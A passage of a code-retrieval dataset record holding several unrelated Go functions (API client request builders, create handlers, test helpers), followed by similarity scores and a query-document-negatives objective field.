header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\t// body params\n\tif localVarOptionals != nil && localVarOptionals.Category.IsSet() {\n\t\tlocalVarOptionalCategory, localVarOptionalCategoryok := localVarOptionals.Category.Value().(Category)\n\t\tif !localVarOptionalCategoryok {\n\t\t\treturn localVarReturnValue, nil, reportError(\"category should be Category\")\n\t\t}\n\t\tlocalVarPostBody = &localVarOptionalCategory\n\t}\n\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func newSubTodoes(c *Client) *subtodos {\n\treturn &subtodos{\n\t\tclient: c.RESTClient(),\n\t}\n}", "func (c *pcrBranchCtx) newSubBranch(bp *secboot_tpm2.PCRProtectionProfileBranchPoint, params *loadParams) *pcrBranchCtx {\n\tnewCtx := *c\n\tnewCtx.branch = bp.AddBranch()\n\tnewCtx.params = *params\n\treturn &newCtx\n}", "func (c *Client) NewCreateCategoriesRequest(ctx context.Context, path string, payload *CreateCategoriesPayload, contentType string) (*http.Request, error) {\n\tvar body bytes.Buffer\n\tif contentType == \"\" {\n\t\tcontentType = \"*/*\" // Use default encoder\n\t}\n\terr := c.Encoder.Encode(payload, &body, contentType)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to encode body: %s\", err)\n\t}\n\tscheme := c.Scheme\n\tif scheme == \"\" {\n\t\tscheme = \"http\"\n\t}\n\tu := url.URL{Host: c.Host, Scheme: scheme, Path: path}\n\treq, err := http.NewRequest(\"POST\", u.String(), &body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\theader := req.Header\n\tif contentType == \"*/*\" {\n\t\theader.Set(\"Content-Type\", \"application/json\")\n\t} else {\n\t\theader.Set(\"Content-Type\", contentType)\n\t}\n\tif c.JWTSecSigner != nil {\n\t\tif err := c.JWTSecSigner.Sign(req); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn req, nil\n}", "func (s *SubmissionHandler) createSubmission(subInfo map[string]interface{}) error {\n\tps, e := convert.GetString(subInfo, db.PROJECTID)\n\tif e != nil {\n\t\treturn e\n\t}\n\ts.submission.ProjectId, e = convert.Id(ps)\n\tif e != nil {\n\t\treturn e\n\t}\n\ts.submission.Time, e = convert.GetInt64(subInfo, db.TIME)\n\tif e != nil {\n\t\treturn e\n\t}\n\tif e = db.Add(db.SUBMISSIONS, s.submission); e != nil {\n\t\treturn e\n\t}\n\treturn s.writeJSON(s.submission)\n}", "func (s *Subscribe) CreateSub(contact, api string, admin, ignore bool) *Subscriber {\n\tfor i := range s.Subscribers {\n\t\tif contact == s.Subscribers[i].Contact && api == s.Subscribers[i].API {\n\t\t\ts.Subscribers[i].Admin = admin\n\t\t\ts.Subscribers[i].Ignored = ignore\n\t\t\t// Already exists, return it.\n\t\t\treturn s.Subscribers[i]\n\t\t}\n\t}\n\n\ts.Subscribers = append(s.Subscribers, &Subscriber{\n\t\tContact: contact,\n\t\tAPI: api,\n\t\tAdmin: admin,\n\t\tIgnored: ignore,\n\t\tEvents: &Events{\n\t\t\tMap: make(map[string]*Rules),\n\t\t},\n\t})\n\n\treturn s.Subscribers[len(s.Subscribers)-1]\n}", "func (o *CreateSubCategoryCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(201)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func CreateMultiCol(cols [][]string, colNames []string) Columns {\n\tvar newLevels []ColLevel\n\tfor i := 0; i < len(cols); i++ {\n\t\tvar levelName string\n\t\tif i < len(colNames) {\n\t\t\tlevelName = colNames[i]\n\t\t}\n\t\tnewLevel := NewColLevel(cols[i], levelName)\n\t\tnewLevels = append(newLevels, newLevel)\n\t}\n\treturn NewColumns(newLevels...)\n}", "func (c *TestClient) CreateSubnetwork(project, region string, n *compute.Subnetwork) error {\n\tif c.CreateSubnetworkFn != nil {\n\t\treturn c.CreateSubnetworkFn(project, region, n)\n\t}\n\treturn c.client.CreateSubnetwork(project, region, n)\n}", "func createTestHeader(t *testing.T, txType common.HeaderType, channelId string, creator []byte, useGoodTxid bool) (*common.Header, error) {\n\tnonce := []byte(\"nonce-abc-12345\")\n\n\t// useGoodTxid is used to for testing purpose. When it is true, we use a bad value for txid\n\ttxid := \"bad\"\n\tif useGoodTxid {\n\t\ttxid = protoutil.ComputeTxID(nonce, creator)\n\t}\n\n\tchdr := &common.ChannelHeader{\n\t\tType: int32(txType),\n\t\tChannelId: channelId,\n\t\tTxId: txid,\n\t\tEpoch: uint64(0),\n\t}\n\n\tshdr := &common.SignatureHeader{\n\t\tCreator: creator,\n\t\tNonce: nonce,\n\t}\n\n\treturn &common.Header{\n\t\tChannelHeader: protoMarshal(t, chdr),\n\t\tSignatureHeader: protoMarshal(t, shdr),\n\t}, nil\n}", "func (h *CategoryHandler) Create(ctx iris.Context) {\n\tvar cat entity.Category\n\tif err := ctx.ReadJSON(&cat); err != nil {\n\t\treturn\n\t}\n\n\tid, err := h.service.Insert(ctx.Request().Context(), cat)\n\tif err != nil {\n\t\tif err == sql.ErrUnprocessable {\n\t\t\tctx.StopWithJSON(iris.StatusUnprocessableEntity, newError(iris.StatusUnprocessableEntity, ctx.Request().Method, ctx.Path(), \"required fields are missing\"))\n\t\t\treturn\n\t\t}\n\n\t\tdebugf(\"CategoryHandler.Create(DB): %v\", err)\n\t\twriteInternalServerError(ctx)\n\t\treturn\n\t}\n\n\t// Send 201 with body of {\"id\":$last_inserted_id\"}.\n\tctx.StatusCode(iris.StatusCreated)\n\tctx.JSON(iris.Map{cat.PrimaryKey(): id})\n}", "func TestAccBuildDefinitionBitbucket_Create(t *testing.T) {\n\tprojectName := testutils.GenerateResourceName()\n\tresource.ParallelTest(t, resource.TestCase{\n\t\tPreCheck: func() { testutils.PreCheck(t, nil) },\n\t\tProviders: testutils.GetProviders(),\n\t\tCheckDestroy: checkBuildDefinitionDestroyed,\n\t\tSteps: []resource.TestStep{\n\t\t\t{\n\t\t\t\tConfig: testutils.HclBuildDefinitionResourceBitbucket(projectName, \"build-def-name\", \"\\\\\", \"\"),\n\t\t\t\tExpectError: regexp.MustCompile(\"bitbucket repositories need a referenced service connection ID\"),\n\t\t\t}, {\n\t\t\t\tConfig: testutils.HclBuildDefinitionResourceBitbucket(projectName, \"build-def-name\", \"\\\\\", \"some-service-connection\"),\n\t\t\t\tCheck: checkBuildDefinitionExists(\"build-def-name\"),\n\t\t\t},\n\t\t},\n\t})\n}", "func createCRD(apiclient apiextensionsclient.Interface, resource CustomResource) error {\n\tcrdName := fmt.Sprintf(\"%s.%s\", resource.Plural, resource.Group)\n\tcrd := &apiextensionsv1beta1.CustomResourceDefinition{\n\t\tObjectMeta: metav1.ObjectMeta{Name: crdName},\n\t\tSpec: apiextensionsv1beta1.CustomResourceDefinitionSpec{\n\t\t\tGroup: resource.Group,\n\t\t\tVersion: resource.Version,\n\t\t\tScope: resource.Scope,\n\t\t\tNames: apiextensionsv1beta1.CustomResourceDefinitionNames{\n\t\t\t\tSingular: resource.Name,\n\t\t\t\tPlural: resource.Plural,\n\t\t\t\tKind: resource.Kind,\n\t\t\t\tShortNames: resource.ShortNames,\n\t\t\t},\n\t\t},\n\t}\n\n\t_, err := apiclient.ApiextensionsV1beta1().CustomResourceDefinitions().Create(crd)\n\tif err != nil {\n\t\tif !errors.IsAlreadyExists(err) {\n\t\t\treturn fmt.Errorf(\"failed to create %s CRD. %+v\", resource.Name, err)\n\t\t}\n\t}\n\treturn nil\n}", "func createStorageCategory(db *gorm.DB, storageCategory *entity.StorageCategory) (*entity.StorageCategory, error) {\n\tvar storageCategoryExists entity.StorageCategory\n\terr := db.Where(\"slug = ?\", storageCategory.Slug).Take(&storageCategoryExists).Error\n\tif err != nil {\n\t\tif errors.Is(err, gorm.ErrRecordNotFound) {\n\t\t\terr := db.Create(storageCategory).Error\n\t\t\tif err != nil {\n\t\t\t\treturn storageCategory, err\n\t\t\t}\n\t\t\treturn storageCategory, err\n\t\t}\n\t\treturn storageCategory, err\n\t}\n\treturn storageCategory, err\n}", "func CreateCertificateHandler(w http.ResponseWriter, req *http.Request) {\n\t_, authorization := GetParamsAndSetContentTypeToJson(w, req)\n\n\tvar certificate Certificate\n\tDecodeFromJson(w, req, &certificate)\n\n\tcertificate.CreatedAt = time.Now()\n\tcertificate.OwnerId = authorization\n\tcertificate.Id = xid.New().String()\n\tcertificate.Transfer = &Transfer{}\n\tcertificates = append(certificates, certificate)\n\n\tEncodeToJson(w, certificate)\n}", "func (a *TeamsApiService) CreateSubteam(ctx context.Context, teamId string, name string) (TeamPublicRepresentation, *http.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = strings.ToUpper(\"Post\")\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t \tsuccessPayload TeamPublicRepresentation\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/team/{teamId}/subteam\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"teamId\"+\"}\", fmt.Sprintf(\"%v\", teamId), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{ \"application/x-www-form-urlencoded\", }\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\n\t\t\"application/json\",\n\t\t}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\tlocalVarFormParams.Add(\"name\", parameterToString(name, \"\"))\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn successPayload, nil, err\n\t}\n\n\tlocalVarHttpResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHttpResponse == nil {\n\t\treturn successPayload, localVarHttpResponse, err\n\t}\n\tdefer localVarHttpResponse.Body.Close()\n\tif localVarHttpResponse.StatusCode >= 300 {\n\t\tbodyBytes, _ := ioutil.ReadAll(localVarHttpResponse.Body)\n\t\treturn successPayload, localVarHttpResponse, reportError(\"Status: %v, Body: %s\", localVarHttpResponse.Status, bodyBytes)\n\t}\n\n\tif err = json.NewDecoder(localVarHttpResponse.Body).Decode(&successPayload); err != nil {\n\t\treturn successPayload, localVarHttpResponse, err\n\t}\n\n\n\treturn successPayload, localVarHttpResponse, err\n}", "func (a *GrafeasApiService) CreateOperation(ctx context.Context, parent string, body ApiCreateOperationRequest) (LongrunningOperation, *http.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = strings.ToUpper(\"Post\")\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue LongrunningOperation\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/v1alpha1/{parent}/operations\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"parent\"+\"}\", fmt.Sprintf(\"%v\", parent), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = &body\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHttpResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHttpResponse == nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tlocalVarBody, err := ioutil.ReadAll(localVarHttpResponse.Body)\n\tlocalVarHttpResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tif localVarHttpResponse.StatusCode < 300 {\n\t\t// If we succeed, return the data, otherwise pass on to decode error.\n\t\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"));\n\t\tif err == nil { \n\t\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t\t}\n\t}\n\n\tif localVarHttpResponse.StatusCode >= 300 {\n\t\tnewErr := GenericSwaggerError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHttpResponse.Status,\n\t\t}\n\t\t\n\t\tif localVarHttpResponse.StatusCode == 200 {\n\t\t\tvar v LongrunningOperation\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"));\n\t\t\t\tif err != nil {\n\t\t\t\t\tnewErr.error = err.Error()\n\t\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t\t}\n\t\t\t\tnewErr.model = v\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\t\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHttpResponse, nil\n}", "func (s *Handler) CreateSubdomain(i primitive.ObjectID, d string) error {\n\n\tcollection := s.DB.Database(\"go-telegram-bot-base-bot\").Collection(\"domains\")\n\n\ts.SetSubdomain(i, d)\n\t_, err := collection.InsertOne(context.TODO(), s.Domain)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\treturn nil\n}", "func CreateFaucetSubAccount(faucetName, faucetPasswd, faucetAddr string, subAccNum int) ([]types.AccountInfo, error) {\n\tvar (\n\t\tmethod = \"CreateFaucetSubAccount\"\n\t\tcreatedAccs, subAccs []types.AccountInfo\n\t)\n\n\tkeyChan := make(chan types.AccountInfo)\n\n\t// create sub account\n\tfor i := 1; i <= subAccNum; i++ {\n\t\tkeyName := fmt.Sprintf(\"%v_%v\", faucetName, i)\n\t\tgo CreateKey(keyName, keyChan)\n\t}\n\n\tcounter := 0\n\tfor {\n\t\taccInfo := <-keyChan\n\t\tif accInfo.Address != \"\" {\n\t\t\tcreatedAccs = append(createdAccs, accInfo)\n\t\t}\n\t\tcounter++\n\t\tif counter == subAccNum {\n\t\t\tlog.Printf(\"%v: all create sub faucet key goroutine over\\n\", method)\n\t\t\tlog.Printf(\"%v: except create %v accounts, successful create %v accounts\",\n\t\t\t\tmethod, subAccNum, len(createdAccs))\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// distribute token\n\n\t// get sender info\n\tsenderInfo := types.AccountInfo{\n\t\tLocalAccountName: faucetName,\n\t\tPassword: faucetPasswd,\n\t\tAddress: faucetAddr,\n\t}\n\taccInfo, err := account.GetAccountInfo(senderInfo.Address)\n\tif err != nil {\n\t\tlog.Printf(\"%v: get faucet info fail: %v\\n\", method, err)\n\t\treturn subAccs, err\n\t}\n\tsenderInfo.AccountNumber = accInfo.AccountNumber\n\tsenderSequence, err := helper.ConvertStrToInt64(accInfo.Sequence)\n\tif err != nil {\n\t\tlog.Printf(\"%v: convert sequence to int64 fail: %v\\n\", method, err)\n\t\treturn subAccs, err\n\t}\n\n\t// get transfer amount which equal senderBalance / subAccNum\n\tamt, err := parseCoins(accInfo.Coins)\n\tif err != nil {\n\t\tlog.Printf(\"%v: parse coin failed: %v\\n\", method, err)\n\t\treturn subAccs, err\n\t}\n\ttransferAmt := fmt.Sprintf(\"%v%s\", parseFloat64ToStr(amt/float64(subAccNum+1)), constants.Denom)\n\n\t// distribute token to created accounts\n\tfor _, acc := range createdAccs {\n\t\tsenderInfo.Sequence = fmt.Sprintf(\"%v\", senderSequence)\n\t\tacc, err := DistributeToken(senderInfo, acc, transferAmt)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"%v: distribute token to %v failed: %v\\n\",\n\t\t\t\tmethod, acc.LocalAccountName, err)\n\t\t} else {\n\t\t\tsubAccs = append(subAccs, acc)\n\t\t\tsenderSequence += 1\n\t\t}\n\t}\n\n\treturn subAccs, err\n}", "func SubInitAttributes() {\n\ttraceEntry(\"SubInitAttributes\")\n\tci := getConnection(GetConnectionKey())\n\tos := &ci.objectStatus[OT_SUB]\n\tst := GetObjectStatus(GetConnectionKey(), OT_SUB)\n\n\tif os.init {\n\t\ttraceExit(\"SubInitAttributes\", 1)\n\t\treturn\n\t}\n\tst.Attributes = make(map[string]*StatusAttribute)\n\n\tattr := ATTR_SUB_ID\n\tst.Attributes[attr] = newPseudoStatusAttribute(attr, \"Subscription Id\")\n\tattr = ATTR_SUB_NAME\n\tst.Attributes[attr] = newPseudoStatusAttribute(attr, \"Subscription Name\")\n\tattr = ATTR_SUB_TOPIC_STRING\n\tst.Attributes[attr] = newPseudoStatusAttribute(attr, \"Topic String\")\n\n\tattr = ATTR_SUB_TYPE\n\tst.Attributes[attr] = newStatusAttribute(attr, \"Subscription Type\", ibmmq.MQIACF_SUB_TYPE)\n\n\tattr = ATTR_SUB_SINCE_PUB_MSG\n\tst.Attributes[attr] = newStatusAttribute(attr, \"Time Since Message Received\", -1)\n\n\t// These are the integer status fields that are of interest\n\tattr = ATTR_SUB_MESSAGES\n\tst.Attributes[attr] = newStatusAttribute(attr, \"Messages Received\", ibmmq.MQIACF_MESSAGE_COUNT)\n\tst.Attributes[attr].delta = true\n\n\tos.init = true\n\ttraceExit(\"SubInitAttributes\", 0)\n}", "func CreateSubLogger(loggerName string) (zerolog.Logger, error) {\n\n\t// look to see if there is a default level we should be using\n\tdefaultLevelString, ok := logLevels[\"_default\"]\n\tif !ok {\n\t\tdefaultLevelString = \"info\"\n\t}\n\n\t// set the log level using the default of INFO unless it is override by the logLevels map\n\tlevelString, ok := logLevels[loggerName]\n\tif !ok {\n\t\tlevelString = defaultLevelString\n\t}\n\n\t// translate the received log level into the zerolog Level type\n\tlevel, err := levelStringToZerologLevel(levelString)\n\tif err != nil {\n\t\trootLogger.Info().Msgf(\"Received bad level %v when creating the %v sublogger. Failing back to INFO level.\", levelString, loggerName)\n\t\tlevel = zerolog.InfoLevel\n\t}\n\n\t// create the logger\n\tthisLogger := rootLogger.With().Str(\"loggerName\", loggerName).Logger().Level(level)\n\treturn thisLogger, nil\n}", "func CreateCSV(\n\tctx context.Context,\n\tt *testing.T,\n\tf *framework.Framework,\n\tcleanupOpts *framework.CleanupOptions,\n\tnamespacedName types.NamespacedName,\n) {\n\tt.Logf(\"Creating ClusterServiceVersion mock object: '%#v'...\", namespacedName)\n\tcsv := mocks.ClusterServiceVersionMock(namespacedName.Namespace, namespacedName.Name)\n\trequire.NoError(t, f.Client.Create(ctx, &csv, cleanupOpts))\n}", "func (m *MDTServer) CreateSubs(sub *mdtGRPC.SubscribeRequest, g mdtGRPC.GRPCConfigOper_CreateSubsServer) error {\n\ttm := MDTInterface()\n\tb, err := proto.Marshal(tm)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tsubResp := &mdtGRPC.SubscribeResponse{\n\t\tRequestId: 1,\n\t\tData: b,\n\t}\n\n\treturn g.Send(subResp)\n}", "func CreateCourseAnalyticsLog(c *fiber.Ctx) error {\n\t//Get data\n\tvar data map[string]string\n\n\terr := c.BodyParser(&data)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tcourse_id, _ := strconv.Atoi(data[\"c_id\"])\n\tuser_id, _ := strconv.Atoi(data[\"u_id\"])\n\n\tlog := models.CourseAnalyticsLog{\n\t\tCourseId: course_id,\n\t\tUserId: user_id,\n\t\tLog: \"Entered to lesson\",\n\t\tDate: time.Now(),\n\t}\n\n\tdatabase.DB.Create(&log)\n\n\tc.Status(fiber.StatusOK)\n\treturn c.JSON(fiber.Map{\n\t\t\"message\": \"OK\",\n\t})\n}", "func BucketCreateChildBucket(b *bolt.Bucket, childBucketName string) (*bolt.Bucket, error) {\n\tchildBucket, err := b.CreateBucket([]byte(childBucketName))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn childBucket, nil\n}", "func (w *ClusterDynamicClient) Create(obj *unstructured.Unstructured, options metav1.CreateOptions, subresources ...string) (*unstructured.Unstructured, error) {\n\treturn w.dClient.Resource(w.resource).Namespace(w.namespace).Create(w.ctx, obj, options, subresources...)\n}", "func createContrailConfig(fqNameTable *FQNameTableType, tp, name, parentType string, fqName []string) (*ContrailConfig, error) {\n\tu, err := uuid.NewUUID()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tus := u.String()\n\tif (*fqNameTable)[tp] == nil {\n\t\t(*fqNameTable)[tp] = map[string]string{}\n\t}\n\tt := time.Now().String()\n\tts := strings.ReplaceAll(t, \" \", \"T\")\n\tc := ContrailConfig{\n\t\tUUID: us,\n\t\tType: tp,\n\t\tParentType: parentType,\n\t\tDisplayName: name,\n\t\tPerms2: types.PermType2{\n\t\t\tOwner: \"cloud-admin\",\n\t\t\tOwnerAccess: 7,\n\t\t\tGlobalAccess: 5,\n\t\t},\n\t\tIdPerms: types.IdPermsType{\n\t\t\tEnable: true,\n\t\t\tUuid: &types.UuidType{\n\t\t\t\tUuidMslong: binary.BigEndian.Uint64(u[:8]),\n\t\t\t\tUuidLslong: binary.BigEndian.Uint64(u[8:]),\n\t\t\t},\n\t\t\tCreated: ts,\n\t\t\tLastModified: ts,\n\t\t\tUserVisible: true,\n\t\t\tPermissions: &types.PermType{\n\t\t\t\tOwner: \"cloud-admin\",\n\t\t\t\tOwnerAccess: 7,\n\t\t\t\tOtherAccess: 7,\n\t\t\t\tGroup: \"cloud-admin-group\",\n\t\t\t\tGroupAccess: 7,\n\t\t\t},\n\t\t\tDescription: \"\",\n\t\t\tCreator: \"\",\n\t\t},\n\t\tFqName: fqName,\n\t}\n\t(*fqNameTable)[tp][fmt.Sprintf(\"%s:%s\", strings.Join(fqName, \":\"), us)] = \"null\"\n\treturn &c, nil\n}", "func buildHeader(header restful.Header) spec.Header {\n\tresponseHeader := spec.Header{}\n\tresponseHeader.Type = header.Type\n\tresponseHeader.Description = header.Description\n\tresponseHeader.Format = header.Format\n\tresponseHeader.Default = header.Default\n\n\t// If type is \"array\" items field is required\n\tif header.Type == arrayType {\n\t\tresponseHeader.CollectionFormat = header.CollectionFormat\n\t\tresponseHeader.Items = buildHeadersItems(header.Items)\n\t}\n\n\treturn responseHeader\n}", "func (s *Section) CreateTitle() *Title {\n\ts.title = &Title{}\n\treturn s.title\n}", "func (a *Client) PostAPIV1UsageCostGetForSubcategory(params *PostAPIV1UsageCostGetForSubcategoryParams, authInfo runtime.ClientAuthInfoWriter) (*PostAPIV1UsageCostGetForSubcategoryOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewPostAPIV1UsageCostGetForSubcategoryParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"PostAPIV1UsageCostGetForSubcategory\",\n\t\tMethod: \"POST\",\n\t\tPathPattern: \"/api/v1/UsageCost/getForSubcategory\",\n\t\tProducesMediaTypes: []string{\"application/json\", \"text/json\", \"text/plain\"},\n\t\tConsumesMediaTypes: []string{\"application/*+json\", \"application/json\", \"application/json-patch+json\", \"text/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &PostAPIV1UsageCostGetForSubcategoryReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*PostAPIV1UsageCostGetForSubcategoryOK)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\t// safeguard: normally, absent a default response, unknown success responses return an error above: so this is a codegen issue\n\tmsg := fmt.Sprintf(\"unexpected success response for PostAPIV1UsageCostGetForSubcategory: API contract not enforced by server. Client expected to get an error, but got: %T\", result)\n\tpanic(msg)\n}", "func Create(children ...Element) *CompoundElement { return newCE(\"Create\", children) }" ]
[ "0.66819435", "0.5615386", "0.54907864", "0.52989936", "0.52907383", "0.5224993", "0.5219203", "0.5214657", "0.5207687", "0.51817536", "0.5170403", "0.50995934", "0.5090224", "0.5088297", "0.5087905", "0.50834537", "0.505557", "0.4943674", "0.4890234", "0.4861894", "0.48557934", "0.48405883", "0.48387685", "0.48161712", "0.4814312", "0.48103684", "0.48054454", "0.4788103", "0.4749378", "0.47428137", "0.473892", "0.4689516", "0.46817085", "0.46585697", "0.46548873", "0.46528563", "0.46433964", "0.46239445", "0.46123847", "0.4609784", "0.46053582", "0.45864", "0.45551634", "0.45507956", "0.45319182", "0.45165455", "0.45156416", "0.45004624", "0.44887847", "0.44861025", "0.4485678", "0.4477434", "0.44762772", "0.44697875", "0.4463737", "0.446006", "0.4445594", "0.4441045", "0.44381145", "0.44315976", "0.442686", "0.44265926", "0.4409334", "0.4408513", "0.44075775", "0.43951917", "0.43948668", "0.43923062", "0.43885073", "0.43854415", "0.43770182", "0.43645447", "0.43631652", "0.43525288", "0.43445766", "0.43405214", "0.43383473", "0.43375814", "0.43345994", "0.43296105", "0.43283305", "0.43161285", "0.43116042", "0.43104142", "0.43084663", "0.43066803", "0.43001753", "0.42854896", "0.427736", "0.42759916", "0.42714915", "0.42683068", "0.4266362", "0.42635834", "0.42600977", "0.4259715", "0.4259546", "0.4250358", "0.4248615", "0.42460567" ]
0.561965
1
WithPayload adds the payload to the create sub category created response
func (o *CreateSubCategoryCreated) WithPayload(payload *models.SubCategory) *CreateSubCategoryCreated { o.Payload = payload return o }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *CreateSubCategoryCreated) SetPayload(payload *models.SubCategory) {\n\to.Payload = payload\n}", "func CreateCategory (w http.ResponseWriter, r *http.Request) {\n\tvar newCategory Category\n\n\t//get the information containing in request's body\n\t//or report an error\n\treqBody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tfmt.Fprintf(w, \"Kindly enter data with the category name and description only in order to update\")\n\t\tlog.Fatal(err.Error())\n\t}\n\n\t//generate unique categoryID\n\tnewCategory.CategoryID = xid.New().String()\n\t//unmarshal the information from JSON into the Category instance\n\t//or report an error\n\tif err = json.Unmarshal(reqBody, &newCategory); err != nil {\n\t\tlog.Printf(\"Body parse error, %v\", err.Error())\n\t\tw.WriteHeader(400)\n\t\treturn\n\t}\n\n\t//CategoryName is required field\n\tif len(newCategory.CategoryName) == 0 {\n\t\tw.WriteHeader(422)\n\t\tfmt.Fprintf(w, \"Kindly enter data with the category name in order to create new category\")\n\t\treturn\n\t}\n\n\t//append the new category to the slice\n\tCategories = append(Categories, newCategory)\n\tw.WriteHeader(http.StatusCreated)\n\n\t//return the category in response\n\t//or report an error\n\tif err = json.NewEncoder(w).Encode(newCategory); err != nil {\n\t\tlog.Printf(err.Error())\n\t\tw.WriteHeader(500)\n\t\treturn\n\t}\n}", "func (o 